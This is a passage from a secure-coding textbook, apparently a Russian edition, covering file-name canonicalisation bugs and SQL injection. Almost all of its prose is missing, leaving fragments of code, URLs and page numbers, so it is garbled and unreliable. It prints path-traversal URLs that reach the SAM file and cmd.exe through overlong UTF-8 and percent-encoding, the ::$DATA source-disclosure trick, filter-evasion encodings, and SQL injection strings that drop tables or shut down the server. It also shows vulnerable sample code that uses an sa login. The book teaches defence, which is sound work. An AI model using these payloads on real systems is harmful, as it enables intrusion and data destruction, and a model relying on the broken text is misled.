http://www.securityfocus.com/
archive/1/190036.
DOS
, MSDOS
Windows .
, , (aux)
(lpt1 prn). ,
Windows 95 Windows 98 . Windows
,
, .
http://www.microsoft.com/technet/security/bulletin/MS00017.asp.
/tmp
StarOffice Sun
,
UNIX Linux. (symbolic link, symlink)
, ; ,
. UNIX ,
(hard link). ,
symlink .
11
315
Windows 2000 Create

HardLink.
, /tmp/frodo
UNIX (/etc/passwd)
.
StarOffice /tmp/soffice.tmp,
. UNIX
, 0777, , Everyone
( ). /tmp/soffice.tmp
. StarOffice,
(
,
).
.
, /tmp/soffice.tmp /etc/passwd
StarOffice , /etc/passwd .
http://www.securityfocus.com/bid/1922.

. , ,
,
.
!
, , ,
, .
!
, !
Windows
Windows ,
.
,
, .
8.3
, , , FAT,
MSDOS, : 8
3 (, , ).
FAT32 NTFS , , NTFS
255 Unicode.
NTFS FAT32 8.3,
316
II
MSDOS 16 Windows

.
8.3
: 6 ,
(~) (
1 9), 3 .
, My Secret File.2001.Aug.doc MYSECR~1.DOC.
,
.
,
, .
Fiscal02Budget.xls 172.30.x.x,
,
, ,
. , Fiscal02Budget.xls Fiscal~1.xls
.
:
String SensitiveFiles[] = {"Fiscal02Budget.xls", "ProductPlans.Doc"};

IPAddress RestrictedIP[] = {172.30.0.0, 192.168.200.0};
BOOL AllowAccessToFile(FileName, IPAddress) {
If (FileName In SensitiveFiles[] && IPAddress In RestrictedIP[])
Return FALSE;
Else
Return TRUE;
}
BOOL fAllow = FALSE;
// .
fAllow = AllowAccessToFile("Fiscal02Budget.xls", "172.30.43.12");
// . !
fAllow = AllowAccessToFile("FISCAL~1.XLS", "172.30.43.1 2");
, , ,
MSDOS 16 Windows
, , 8.3.
.
8.3:
,
. ?
8.3 !
.
11
317
NTFS
,
: ,
. ,
.asp, IIS Asp.dll.
.asp::$DATA, IIS ,
NTFS, ASP.

, Streams.exe Sysinternals (http://www.sysinternals.com),
Crucial ADS Crucial Security (http://www.crucialsecurity.com)
Security Expressions Pedestal Software (http://www.pedestalsoft
ware.com).
,
, ,
. ,
(access control list, ACL)
ACL .

, (.) (\),
, .
Win32,
, ,
. ,
Web, 17. ,
, (. Secureco2\Chapter11\Trai
lingDot):
#include <strsafe.h>
char b[20];
StringcbCopy(b, sizeof(b), "Hello!");
HANDLE h = CreateFile("c:\\somefile.txt",
GENERIC_WRITE,
0, NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (h != INVALID_HANDLE_VALUE) {
DWORD dwNum = 0;
WriteFile(h, b, lstrlen(b), &dwNum, NULL);
CloseHandle(h);
}
h = CreateFile("c:\\somefile.txt.", // .
GENERIC_READ,
0, NULL,
OPEN_EXISTING,
318
II
NULL);
if (h != INVALID_HANDLE_VALUE) {
char b[20];
DWORD dwNum =0;
ReadFile(h, b, sizeof b, &dwNum, NULL);
CloseHandle(h);
}
?
CreateFile somefile.txt
, somefile.txt
. ,
! , somefile.txt. somefile.txt ,
.
\\?\
( ANSI)
MAX_PATH (260). Unicode
32 000 Unicode,
\\?\. .
260 .
\\?\c:\temp\myfile.txt , c:\temp\myfile.txt.

\\?\, .
(..)
, , Web FTP
, .
,
.
.

, c:\datafiles. ,

. , ..\boot.ini,
(
) , , . .\winnt\repair\sam,
(Security Account Manager, SAM)
.
( , Windows 2000
Active Directory, SAM.)
, L0phtCrack ( http://www.atsta
ke.com), .
!
11
319
Windows 2000 SAM [

(SysKey)],
. SysKey Windows NT System Key Permits
Strong Encryption of the SAM (http://support.microsoft.com/support/kb/
articles/Q143/4/75.asp) Microsoft Knowledge Base.
?
c:\dir\foo\files\secret
c:\dir\foo\myfile.txt:
c:\dir\foo\files\secret\..\..\myfile.txt;
c:\dir\foo\files\..\myfile.txt;
c:\dir\..\dir\foo\files\..\myfile.txt.
!

, , ?
? , PATH?
. ,
File.exe File.exe:
, PATH?
,
Windows, .
NTFS ,
. MyFile.txt myfile.txt .
:
POSIX (Portable Operating System Interface for UNIX).
,
, Apple Mac OS X Web Apache.
UNC

(Universal Naming Convention, UNC). UNC
Windows
. UNC
.
BlakeLaptop Files,
c:\My Documents\Files. Z:
, net use z: \\BlakeLaptop\Files. z:\my
file.txt c:\My Documents\Files\myfile.txt .
UNC ,
. , \\BlakeLaptop\Files\myfile.txt z:\myfile.txt. UNC
\\?\, \\?\UNC\BlakeLaptop\Files
\\BlakeLaptop\Files.
320
II
, Windows XP WebDAV (Webbased Distri

buted Authoring and Versioning),
Web , Add
Network Place Wizard ( ). ,
Web,
.
:
API ( CreateFile)
, (named pipe) (mailslot).
,
.

(fireandforget).
(
), , ,
, . : \\<_
>\pipe\<_>, :
\\<_>\mail
slot\<_>\.
:

Windows
. , COM1
, AUX , LPT2
..
: CON, PRN, AUX, CLOCK$, NUL, COM1 COM9,
LPT1 LPT9. ,
NUL.txt, .
: . ,
C:\Program Files\COM1 , d:\North
WindTraders\COM1.
, ,
, ,
, . ,
.
\documents\com1, .
, ! ,
, .
, ,
,
, .
Web.
11
321

, ,
Windows. , Linux
, , /dev/
mouse, /dev/console, /dev/tty0, /dev/zero .
, Mandrake
Linux 7.1 Netscape 4.73, , file:///
dev/mouse
. , file:///dev/zero
.
, Web <IMG
SRC=file:///dev/mouse>.
,
.
Web
, ,
URL . ,
, . , .
AOL
America Online (AOL) 5.0 ,
Web
. URL ,
Web ,
. : ,
. , ,

, Web ( )
URL.
(. http://www.slashdot.org/features/00/07/15/
0327239.shtml).
eEye
, SecureIIS,
Internet Information Services (IIS).
eEye (http://www.eeye.com) SecureIIS:
SecureIIS Web Microsoft Internet Information Services
. SecureIIS IIS

Web
.
322
II
SecureIIS .
. ,
, ( )
, URL
action=delete. SecureIIS,
. , action=de
lete action=%64elete . %64
d.
Web
. , ,
URL, : http://www.northwindtraders.com/scripts/process.asp?fi
le=../../../winnt/repair/sam (
SAM). (..) (/), SecureIIS
. SecureIIS ,
: http://www.northwindtraders.com/scripts/process.asp?file=%2e%2e/%2e%2e/%2e
%2e/winnt/repair/sam. , , , %2e
!
Web http://www.security focus.com/
bid/2742.
Internet Explorer 4. IP-

, Internet Explorer 4 ( Url
Mon.dll), ,
, .
, Web. Web
,
Web, .
Internet Explorer 4 ,
, Web Local Intranet Zone (
) Internet Zone (). Web
, , http://www.microsoft.com,
Internet ( , ).
, (http://northwindtraders), Local Intranet,
NetBIOS .
? .
: IP Internet Explorer

Internet, .
. IP ,
, (dotless IP address) IP (dottedIP
address):
<IP > = (a 16777216) + (b 65536) + (c 256) + d

a.b.c.d .
, 192.168.197.100 3232286052. http://
192.168.197.100 Internet Explorer 4 , ,
11
323
Internet. http://3232286052 Internet Explorer 4

, , ,
,
.
Web .
: http://www.microsoft.com/technet/security/bulletin/MS98016.asp.
, ::$DATA
Internet Information Server 4.0
, IIS,
. . NTFS,
Windows NT ,
, Apple Macintosh HFS,
, (fork), :
(data fork) (resource fork). (
Web http://support.microsoft.com/default.aspx?scid=kb;enus;Q147438.).
NTFS ,
. , ( Secureco2\Chap
ter11\NTFSStream) test Bar.txt (
bar.txt:test):
char *szFilename = "c:\\temp\\bar.txt:test";

HANDLE h = CreateFile(szFilename,
GENERIC_WRITE,
0, NULL,
CREATE_ALWAYS,
NULL);
if (h == INVALID_HANDLE_VALUE) {
printf(" CreateFile() %d", GetLastError());
return;
}
char *bBuff = "Hello, stream world!";
DWORD dwWritten = 0;
if (WriteFile(h, bBuff, lstrlen(bBuff), &dwWritten, NUL L)) {
printf("!");
} else {
printf(" WriteFile() %d", GetLastError());
}
,
:
more < bar.txt:test

echo, ,
:
echo Hello, Stream World! > bar.txt:test

more < bar.txt:test
324
II
.
, NTFS
$DATA. ,
NTFS, :
more < boot.ini::$DATA

. 111 , .
( )
boot.ini::$DATA

. 111.
NTFS
NTFS , NTFS,

. , , 16 now john3 readme
john3:16 readme:now.
.
.
IIS . ,
.asp, ASP (Active Server Pages),
Asp.dll. IIS ,
Windows, ,
.
, default
switch. , Data.txt,
, .txt,
.
, Default.asp::$DATA.
, IIS .asp::$DATA
. NTFS, ,
,
Default.asp. http://
www.microsoft.com/technet/security/bulletin/MS98003.asp.

/ .
, file.txt.
IP , ,
:
172.23.11.19 Mike
2002!09!03
13:02:43 file.txt
file.txt\r\n127.0.0.1\tCheryl\t20020903\t13:03:00\tsec
retfile.txt, :
11
172.23.11.19
Mike
2002!09!03
13:02:43 file.txt
127.0.0.1
Cheryl
2002!09!03
13:03:00 secretfile.txt
325
, Cheryl , (127.0.0.1)
? , .
,
!
http://online.securityfocus.com/
archive/82/271498/20020509/20020515/2.
Web

Web
. , URL Web
:
7 8 ASCII;
;
UTF8 ;
Unicode UCS2;
;
HTML ( Web, URL).
7- 8- ASCII-
, .
, .

,
, .
, %20, ( )
%A3. URL, http:/
/www.northwindtraders.com/my%20document.doc http://www.northwindtraders.com/
my%20document%2Edoc my document.doc,
Northwind Traders.

SecureIIS eEye. ,
.
, SecureIIS ,
.
UTF-8
RFC 2279 (http://www.ietf.org/rfc/rfc2279.txt) Unicode
8 (Eightbit Unicode Transformation Format, UTF8).
UTF8
, , 2 (UCS2) 4 (UCS4) Unicode
326
II
ASCII. ,
, .
UTF-8
UTF8 n ,
. , 7
ASCII (0x00 0x7F) 01100001, 0
, 0, 1100001 7 ,
ASCII. , H,
0x48 1001000 , UTF8 01001000
0x48. , 7 ASCII UTF8 .
, , 7
ASCII, Unicode, 0x7FFFFFFF.
, 0x80 0x7FF 110xxxxx 10xxxxxx,
110 10 , x
. , 0xA3
10100011 . UTF8
11000010 10100011 : 0xC2 0xA3.
. UTF8
(. 111).
11-1.
UTF-8
0x000000000x0000007F
0xxxxxxx
0x000000800x000007FF
110xxxxx 10xxxxxx
0x000008000x0000FFFF
1110xxxx 10xxxxxx 10xxxxxx
0x000100000x001FFFFF
11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
0x002000000x03FFFFFF
111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
0x040000000x7FFFFFFF
1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx,

10xxxxxx
:
, UTF8
. UTF8
. ,
(?) 0x3F 00111111
. ,
, :
0xC0 0xBF
0xE0 0x80 0xBF
0xF0 0x80 0x80 0xBF
0xF8 0x80 0x80 0x80 0xBF
0xFC 0x80 0x80 0x80 0x80 0xBF
UTF8 ,
, 0x3F.
11
327
, , UTF8,
IIS 4 IIS 5 .
%c0%af URL
, : http://servername/scripts/..%c0%af../winnt/sys
tem32/cmd.exe. , %c0%af? 11000000
10101111, UTF8, . 81,
11000000 10101111. , 00000101111
0x2F, , (/)! UTF8
(overlong sequence).
, URL, http://<_
>/scripts/../../winnt/system32/cmd.exe. ,
scripts, ,
, system32,
Cmd.exe.

Web http://www.micro
soft.com/technet/security/bulletin/MS00057.asp.
Unicode UCS-2
UCS2
UTF8. UCS2 (Universal Character
Set) , ASCII
, %uNNNN, NNNN
Unicode. , %5C UTF8 ASCII (\),
%u005C , 2 Unicode.
, , %u005C
Unicode, (fullwidth)
. Unicode
.
%uFF00 %uFFEF
%20 %7E. , \
%u005C %uFF3C.

,
, ,
, .
, UTF8 (%5c) : %,
5 c, , UTF8: %25, %35
%63. . 112
(\).
,
,
. ,
, .
328
II
11-2.
%5c
UTF8
%255c
%25 %, 5 c
%%35%63
%, %35 5 %63 c
%25%35%63
%, 5, c UTF8
HTML
HTML ,
. , (< >) < >
£. !

,
. , < , &#3C; (
<) < ( <).
http://
www.w3.org/TR/REChtml40/sgml/entities.html.
, Web , ,
,
.
.

2002 (Alex
Gontmakher), The Homograph
Attack ( ) (http://www.cs.technion.ac.il/~gabr/pubs.html).
,
, (. 112).
. 112. localhost, ? .
localhost ,
ASCII o
11
329
, localhost
o, (U+043E),
, . ,
,
. , ,
: a, c, e, p, y, x, H, T M.
/ (U+2044) / (U+002F). ,
. Unicode ,
14.
(0)
O.
, , URL
,
. , ,
localhost, 1ocalhost?

, ,
, .
: ,
.
.

, ,
.
(ACL)
. , , !
. , IIS ,
, ASP VBScript
Microsoft JScript, ,
. , , .
IIS, , , .
IIS, ::$DATA,
, IIS .
, IP
.
, ,
IP, DNS ,
.
! , ,
.
.
330
II

10, .

, , ,
. , ,
. :
:
C D;

;

, 32 ,
txt, jpg gif.
.

.
, , .
(
10):
^[cd]:(?:\\\w+)+\\\w{1,32}\.(txt|jpg|gif)$
:
c:\mydir\myotherdir\myfile.txt;
d:\mydir\myotherdir\someotherdir\picture.jpg.
:
e:\mydir\myotherdir\myfile.txt ( );
c:\fred.txt ( );
c:\mydir\myotherdir\..\mydir\myfile.txt ( ,
AZaz09 );
c:\mydir\myotherdir\fdisk.exe ( );
c:\mydir\myothe~1\myfile.txt ( );
c:\mydir\myfile.txt::$DATA ( ,
$ );
c:\mydir\myfile.txt. ( );
\\myserver\myshare\myfile.txt ( );
\\?\c:\mydir\myfile.txt ( ).
,
. :
, , .
11
331
! ,
.
.
:
, .
. .
: , ,
.
8.3
.
, .
8.3,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
:
NtfsDisable8dot3NameCreation : REG_DWORD : 1
: .
PATH

PATH .
, . ,
PATH,
c:\myhacktools, %systemroot% !
PATH ? :
,
.
Windows XP
:
, PATH.
,
. : HKEY_LOCAL_MACHINE\Sys
tem\CurrentControlSet\Control\Session Manager\SafeDllSearchMode.
: DWORD, 0.
1 system32.

,
.
, .
332
II

, ,
Win32.
,
, .
,
,
. , CleanCanon ,
.
1. , mysecretfile.txt.
2. . , mysecretfile.txt ,
mysecr~1.txt, mysecretfile.txt::$DATA mysecretfile.txt. ( )
.
3. ,
MAX_PATH, .
DoS .
4. (
) c:\myfiles , c:\myfi
les\mysecretfile.txt. \\?\ ,
,
.
5. GetFullPathName
(..).
6. GetLongPathName ,
. , mysecr~1.txt mysec
retfile.txt. ,
2. !
7. , .
. GetFileType ,
FILE_TYPE_DISK, ,
.
, Linux
UNIX. , ,
C C++ stat
stat.st_mode S_IFREG (0x0100000),
, .
CleanCanon, Visual C++ .NET
Win32:
/*
CleanCanon.cpp
*/
#include "stdafx.h"
#include "atlrx.h"
11
#include <new>
enum errCanon {
ERR_CANON_NO_ERROR = 0,
ERR_CANON_INVALID_FILENAME,
ERR_CANON_INVALID_PATH,
ERR_CANON_NOT_A_FILE,
ERR_CANON_NO_FILE,
ERR_CANON_NO_PATH,
ERR_CANON_TOO_BIG,
ERR_CANON_NO_MEM};
errCanon GetCanonicalFileName(LPCTSTR szFilename,
LPCTSTR szDir,
LPTSTR *pszNewFilename) {
//
//
//
if
(szDir
return
,
MAX_PATH
== NULL)
ERR_CANON_NO_PATH;
size_t cchDirLen = 0;
if (StringCchLength(szDir,MAX_PATH,&cchDirLen) != S_OK ||
cchDirLen > MAX_PATH)
return ERR_CANON_TOO_BIG;
*pszNewFilename = NULL;
LPTSTR szTempFullDir = NULL;
HANDLE hFile = NULL;
errCanon err = ERR_CANON_NO_ERROR;
try {
// 2
// (! ,
// 1!4 ! ).
// ( ! '\').
// .
CAtlRegExp<> reFilename, reDirname;
CAtlREMatchContext<> mc;
reFilename.Parse(_T("^\\a+\\.\\a\\a?\\a?\\a?$"),FALSE);
if (!reFilename.Match(szFilename,&mc))
throw ERR_CANON_INVALID_FILENAME;
reDirname.Parse(_T("^\\c:\\\\[a!z0!9\\\\]+$"),FALSE);
if (!reDirname.Match(szDir,&mc))
size_t cFilename = lstrlen(szFilename);
size_t cDir = lstrlen(szDir);
333
334
II
//
// " " (\).
size_t cNewFilename = cFilename + cDir + 1;
// 3
// , MAX_PATH .
if (cNewFilename > MAX_PATH)
throw ERR_CANON_TOO_BIG;
// .
// '\\?\' '\0'.
LPCTSTR szPrefix = _T("\\\\?\\");
size_t cchPrefix = lstrlen(szPrefix);
size_t cchTempFullDir = cNewFilename + 1 + cchPrefix;
szTempFullDir = new TCHAR[cchTempFullDir];
if (szTempFullDir == NULL)
throw ERR_CANON_NO_MEM;
//
//
//
//
//
if
4
.
\\?\, ,

.
(StringCchPrintf(szTempFullDir,
cchTempFullDir,
_T("%s%s\\%s"),
szPrefix,
szDir,
szFilename) != S_OK)
// 5
// ,
// (..), .
TCHAR szFullPathName [MAX_PATH + 1];
LPTSTR szFilenamePortion = NULL;
DWORD dwFullPathLen =
GetFullPathName(szTempFullDir,
MAX_PATH,
szFullPathName,
&szFilenamePortion);
if (dwFullPathLen > MAX_PATH)
throw ERR_CANON_NO_MEM;
// 6
//
if (GetLongPathName(szFullPathName,
szFullPathName,
MAX_PATH) == 0) {
errCanon errName = ERR_CANON_TOO_BIG;
switch (GetLastError()) {
case ERROR_FILE_NOT_FOUND :
11
335
errName = ERR_CANON_NO_FILE;
break;
case ERROR_NOT_READY :
case ERROR_PATH_NOT_FOUND :
errName = ERR_CANON_NO_PATH;
break;
default : break;
}
throw errName;
}
// 7
// ?
hFile = CreateFile(szFullPathName,
0,0,NULL,
OPEN_EXISTING,
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION,
NULL);
if (hFile == INVALID_HANDLE_VALUE)
throw ERR_CANON_NO_FILE;
if (GetFileType(hFile) != FILE_TYPE_DISK)
throw ERR_CANON_NOT_A_FILE;
// , !
// ,
// (pszNewFilename).
const size_t cNewFilenane = lstrlen(szFullPathName)+1;
*pszNewFilename = new TCHAR[cNewFilenane];
if (*pszNewFilename != NULL)
StringCchCopy(*pszNewFilename,cNewFilenane,szFullPathName);
else
err = ERR_CANON_NO_MEM;
} catch(errCanon e) {
err = e;
} catch (std::bad_alloc a) {
err = ERR_CANON_NO_MEM;
}
delete [] szTempFullDir;
if (hFile) CloseHandle(hFile);
return err;
}
Secureco2\Chapter11\CleanCanon. Create
File : , , ,
, .
336
II
CreateFile
, , , dwFlags
AndAttributes . .
,
,
. . , , ,
. ,
, , ,
.
,
, . ,
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION
, FILE_FLAG_OPEN_NO_RECALL, ,
, .
(Hierarchical Storage Manage
ment) .
Web.

Web
,
, ,
.

.
,
. : .
: , ,
, .
, ,
, !
UTF-8
UTF8,
Windows MultiByteToWideChar.
,
UTF8. Secure
co2\Chapter11\UTF8. , UTF8 ,
WideCharToMultiByte, CP_UTF8.
void FromUTF8(LPBYTE pUTF8, DWORD cbUTF8) {

WCHAR wszResult[MAX_CHAR+1];
DWORD dwResult = MAX_CHAR;
11
337
int iRes = MultiByteToWideChar(CP_UTF8,

0,
(LPCSTR)pUTF8,
cbUTF8,
wszResult,
dwResult);
if (iRes == 0) {
DWORD dwErr = GetLastError();
printf("MultiByteToWideChar() !> %d\n", dwErr);
} else {
printf("MultiByteToWideChar() "
"%S (%d) \n",
wszResult,
iRes);
}
}
void main() {
// Unicode! 0x5c;
// (\).
BYTE pUTF8_1[] = {0x5C};
DWORD cbUTF8_1 = sizeof pUTF8_1;
FromUTF8(pUTF8_1, cbUTF8_1);
// Unicode! 0xC0 0xAF.
// .
// (/).
BYTE pUTF8_2[] = {0xC0, 0xAF};
// Unicode! 0xC2 0xA9;
// ().
BYTE pUTF8_3[] = {0xC2, 0xA9};
}
ISAPI
ISAPI , , ,

C C++, Web
. IIS 6
SCRIPT_TRANSLATED,
URL, (, , ).
338
II
:
,
,
,
.
, .
, .

, Web, ,
, .
DNS, northwindtraders.com. IP,
192.168.197.100. .
localhost, IP
127.n.n.n. Windows NetBIOS,
\\northwindtraders.
, ,
?
,
. ( Secure
co2\Chapter11\CanonServer)
.
/*
CanonServer.cpp
*/
for (int i = ComputerNameNetBIOS;
i <= ComputerNamePhysicalDnsFullyQualified;
i++) {
TCHAR szName[256];
DWORD dwLen = sizeof szName / sizeof TCHAR;
TCHAR *cnf;
switch(i) {
case 0 : cnf = "ComputerNameNetBIOS"; break;
case 1 : cnf = "ComputerNameDnsHostname"; break ;
case 2 : cnf = "ComputerNameDnsDomain"; break;
case 3 : cnf = "ComputerNameDnsFullyQualified"; break;
case 4 : cnf = "ComputerNamePhysicalNetBIOS"; break;
case 5 : cnf = "ComputerNamePhysicalDnsHostname "; break;
case 6 : cnf = "ComputerNamePhysicalDnsDomain"; break;
case 7 : cnf = "ComputerNamePhysicalDnsFullyQualified"; break;
default : cnf = "Unknown"; break;
}
BOOL fRet =
GetComputerNameEx((COMPUTER_NAME_FORMAT)i,
11
339
szName,
&dwLen);
if (fRet) {
printf("%s '%s' .\n", szName, cnf);
} else {
printf(" %d", GetLastError());
}
}
IP ( ) getaddrinfo
Windows Sockets (Winsock) Perl.
, :
my ($name, $aliases, $addrtype, $length, @addrs)

= gethostbyname "mymachinename";
foreach (@addrs) {
my @addr = unpack('C4', $_);
print "IP: @addr\n";
}

, Windows
: <>\<_>. SAM.
, DEVELOPMENT\Blake Blake DEVE
LOPMENT. Windows 2000
(user principal name, UPN),
: <_>@<>, blake@deve
lopment.northwindtraders.com.
:
bool AllowAccess(char *szUsername) {

char *szRestrictedDomains[]={"MARKETING", "SALES"};
for (i = 0;
i < sizeof szRestrcitedDomains /
sizeof szRestrcitedDomains[0];
i++)
if (_strncmpi(szRestrictedDomains[i],
szUsername,
strlen(szRestrictedDomains[i]) == 0)
return false;
return true;
}
false MARKETING SALES.
, MARKETING\Brian false, Brian MARKETING.
, UPN brian@marketing.northwindtraders.com,
true, ,

.
340
II
Windows 2000
SAM. SAM,
, : Win
dows NT 4, Windows 2000, Windows 2000 Active Directory Windows XP.

GetUserNameEx, (. Secureco2\Chapter11\Canon
User):
/*
CanonUser.cpp
*/
#define SECURITY_WIN32
#include <security.h>
for (int i = NameUnknown ;
i <= NameServicePrincipal;
i++) {
TCHAR szName[256];
DWORD dwLen = sizeof szName / sizeof TCHAR;
TCHAR *enf = NULL;
switch(i) {
case 0 : enf = "NameUnknown"; break;
case 1 : enf = "NameFullyQualifiedDN"; break;
case 2 : enf = "NameSamCompatible"; break;
case 3 : enf = "NameDisplay"; break;
case 4 : enf = "NameUniqueId"; break;
case 5 : enf = "NameCanonical"; break;
case 6 : enf = "NameUserPrincipal"; break;
case 7 : enf = "NameUserPrincipal"; break;
case 8 : enf = "NameServicePrincipal"; break;
default : enf = "Unknown"; break;
}
BOOL fRet =
GetUserNameEx((EXTENDED_NAME_FORMAT)i,
szName,
&dwLen);
if (fRet) {
printf("%s '%s' .\n", szName, enf);
} else {
printf("%s %d\n", enf, GetLastError());
}
}
, :
.
11
341
,
. , ACL.
:
, ,
. , .
, :
,
, .
,
.
, !
12

Web
(). , Web XML Web
, ,
.
, Web, . ( 13
Web,
, .)
SQL;
.
2001 . Microsoft Professional Developers Con
ference ( Microsoft)
.
Web .
, 15 .
,
, , .
SQL, ,
, .
,
,
.

, , .
: ,
, .
, ,
,
.
12
343

,
: , ,
,
. .
, (
, ):
string sql = "select * from client where name = '" + name + "'"
name . ,
name SQL. ,
Blake, SQL:
select * from client where name = 'Blake'

, : Blake or 1=1 ? :
select * from client where name = 'Blake' or 1=1 !!

client, Blake,
name. , 1=1,
:
, 1=1 ,
. , ? ,
, . 121.
CustomerCreditCard*
Creditcard*
CustomerID
CreditCardID
CreditCardID
Type
Number
Expires
Customer*
CustomerID
LastName
FirstName
MiddleInitial
Address
Apartment
City
State
PostalCode
Country
. 121. ,

344
II
. ,
,
SQL. , SQL,
,
, .
,
Microsoft SQL Server, IBM DB2, Oracle, PostgreSQL MySql.
, SQL (SQL injection).
SQL,
, or.
SQL,
, .

SQL . ,
SQL Server :
select * from table1 select * from table2

SQL select.
,
SQL.
, ,
: , , . ,
:
Blake' drop table client !!

SQL, Blake,
.
SQL
Professional Developers Conference 2001
, .
, , , !
, , ,
, Web Web,
? :
string Status = "No";

string sqlstring = "";
try {
SqlConnection sql= new SqlConnection(
@"data source=localhost;" +
"user id=sa;password=password;");
sql.Open();
sqlstring="SELECT HasShipped" +
" FROM detail WHERE ID='" + Id + "'";
SqlCommand cmd = new SqlCommand(sqlstring,sql);
if ((int)cmd.ExecuteScalar() != 0)
Status = "Yes";
12
} catch (SqlException se)

Status = sqlstring + "
foreach (SqlError e in
Status += e.Message
}
} catch (Exception e) {
Status = e.ToString();
}
345
{
failed\n\r";
se.Errors) {
+ "\n\r";
C#? : SQL
,
SQL. . Web
sa, (sysadmin)
SQL Server.
: sa SQL Server , SYSTEM Windows NT
.
. sa Oracle
internal.
sa. :
! , .
: SQL
,
, SQL. ,
, ,
.

, .
1:

,
, . ,
.
int age = ...; // , .

string name = ...; // , .
name = name.Replace("'","''");
SqlConnection sql= new SqlConnection(...);
sql.Open();
sqlstring=@"SELECT *" +
" FROM client WHERE name= '" + name + "' or age=" + age;
, ,
. ,
Michael or 1=1 , ( )
346
II
, ,
SQL:
select * FROM client WHERE ID = 'Michael'' or 1=1 !! ' or age=35

age, . , age
35; shutdown . , .
, (;) . 35 shutdown
, , , ,
!
, ,
char(0x27), . :
, :
declare @a char(20) select @a=0x73687574646f776e exec(@a)

SQL,
shutdown.
shutdown ASCII.
? SQL
, !
! ( )
SQL.
2:
, ,
, SQL. !
, .
, sp_GetName:
string name = ...; // , .

SqlConnection sql= new SqlConnection(...);
sql.Open();
sqlstring=@"exec sp_GetName '" + name + "'";
Blake or 1=1 ,
(join) . SQL
:
exec sp_GetName 'Blake' or 1=1 !! '

:
exec sp_GetName 'Blake' insert into client values(1005, 'Mike') !! '

SQL Blake
! ,
SQL.
12
347
, ,
, :
CREATE PROCEDURE sp_MySProc @input varchar(128)

AS
exec(@input)
, ? , !
. ,
.
?
, .
.
1:

SQL Server
(sysadmin)
Web Web. ,
.
Web
.
Web
,
.
SQL , ,
SQL, ,
, :
;
;
;
, ;
;
;
.
.

. Trusted_Connection=True.
( )
,
,
.
,

.
348
II
,

. , SQL Server xp_cmdshell,
. Oracle
utl_file,
.
sysadmin
.
. ,

. ,
!
, SQL.
, .
2:
SQL-
SQL ,
, .
SQL
. (place
holder), (parameterized
command). , SQL
. :
SELECT count(*) FROM client WHERE name=? AND pwd=?

,
SQL. VBScript
:
Function IsValidUserAndPwd(strName, strPwd)

' , SQL Server.
' uid=sa;pwd=
strConn = "Provider=sqloledb;" + _
"Server=server!sql;" + _
"database=client;" + _
"trusted_connection=yes"
Set cn = CreateObject("ADODB.Connection")
cn.Open strConn
Set cmd = CreateObject("ADODB.Command")
cmd.ActiveConnection = cn
cmd.CommandText = _
"select count(*) from client where name=? and pwd=?"
cmd.CommandType = 1
' 1 adCmdText
12
349
cmd.Prepared = true
' :
' 200 (varchar, );
' 1 ( );
' ! 32 .
Set parm1 = cmd.CreateParameter("name", 200, 1, 32, "")
cmd.Parameters.Append parm1
parm1.Value = strName
Set parm2 = cmd.CreateParameter("pwd", 200, 1, 32, "")
cmd.Parameters.Append parm2
parm2.Value = strPwd
Set rs = cmd.Execute
IsValidUserAndPwd = false
If rs(0).value = 1 Then IsValidUserAndPwd = true
rs.Close
cn.Close
End Function
, ,
SQL. ,
: , !

. , ,
SQL,
, .
ODBC , SQLNumParams
SQLBindParam. OLE DB ICommandWith
Parameters. , SqlCommand.

, Web.
.
, .
, quotename. ,
select top 3 name from mytable select top 3 [name] from
[mytable], name mytable. quotename
TransactSQL ( .
SQL Server Books Online). ,
. ,
SQL Query Analyzer .
, ASCII,
.
350
II
declare @a varchar(20)
set @a=0x74735D27
select @a
set @a=quotename(@a)
select @a
set @a='ts]'''
select @a
set @a=quotename(@a)
select @a
@a (ts] ).
, [ ].
, sp_executesql
SQL, .
:
!! .
declare @name varchar(64)
set @name = N'White'
!! .
exec sp_executesql
N'select au_id from pubs.dbo.authors where au_lname=@lname',
N'@lname varchar(64)',
@lname = @name
SQL Server, ,
, ,
. ,
! :
, , .

,
,
( ). Web C#
: , ,
.
//
// SafeQuery
//
using
using
using
using
using
using
System;
System.Data;
System.Data.SqlTypes;
System.Data.SqlClient;
System.Security.Principal;
System.Security.Permissions;
12
using
using
using
using
System.Text.RegularExpressions;
System.Threading;
System.Web;
Microsoft.Win32;
[SqlClientPermissionAttribute(SecurityAction.PermitOnly,
AllowBlankPassword=false)]
[RegistryPermissionAttribute(SecurityAction.PermitOnly,
Read=@"HKEY_LOCAL_MACHINE\SOFTWARE\Client")]
static string GetName(string Id)
{
SqlCommand cmd = null;
string Status = "Name Unknown";
try {
// (ID).
Regex r = new Regex(@"^\d{4,10}$");
if (!r.Match(Id).Success)
throw new Exception(" ID");
// .
SqlConnection sqlConn= new SqlConnection(ConnectionString);
// ID!.
string str="sp_GetName";
cmd = new SqlCommand(str,sqlConn);
cmd.CommandType = CommandType.StoredProcedure;
cmd.Parameters.Add("@ID",Convert.ToInt64(Id));
cmd.Connection.Open();
Status = cmd.ExecuteScalar().ToString();
if (HttpContext.Current.Request.UserHostAddress == "127.0.0.1")
Status = e.ToString();
else
Status = " ";
} finally {
// .
if (cmd != null)
cmd.Connection.Close();
}
return Status;
}
// .
internal static string ConnectionString {
351
352
II
get {
return (string)Registry
.LocalMachine
.OpenSubKey(@"SOFTWARE\Client\")
.GetValue("ConnectionString");
}
}

.

,
.

; .
: 4 10 , .
.
, Web
(, ).

, .
,
sa. ,
,
.
, .
64
( ).
.
, .
, . ,
, .
.
, ,
(ID) 4 10 .
^\d{4,10}$, 4 10
(\d{4,10}) (^) ($) .
,
: SQL
.
System.Text.RegularExpressions.
. ,
, SqlConnection, .
ConnectionString. ,
Web
.
12
353
data source=db007a;
user id=readuser;
password=&ugv4!26dfA!+8;
initial catalog=client
: db007a.
Web,
SQL.
sa, ,
readuser ( ) ,
SQL
client. Web

, master ,
, .
SQL

. ,
,
,
.
, ( , )
, Web.
, Web,
, ! ,
:
AppDomain.CurrentDomain.SetPrincipalPolicy
(PrincipalPolicy.WindowsPrincipal);
WindowsPrincipal user = (WindowsPrincipal)Thread.CurrentPrincipal;
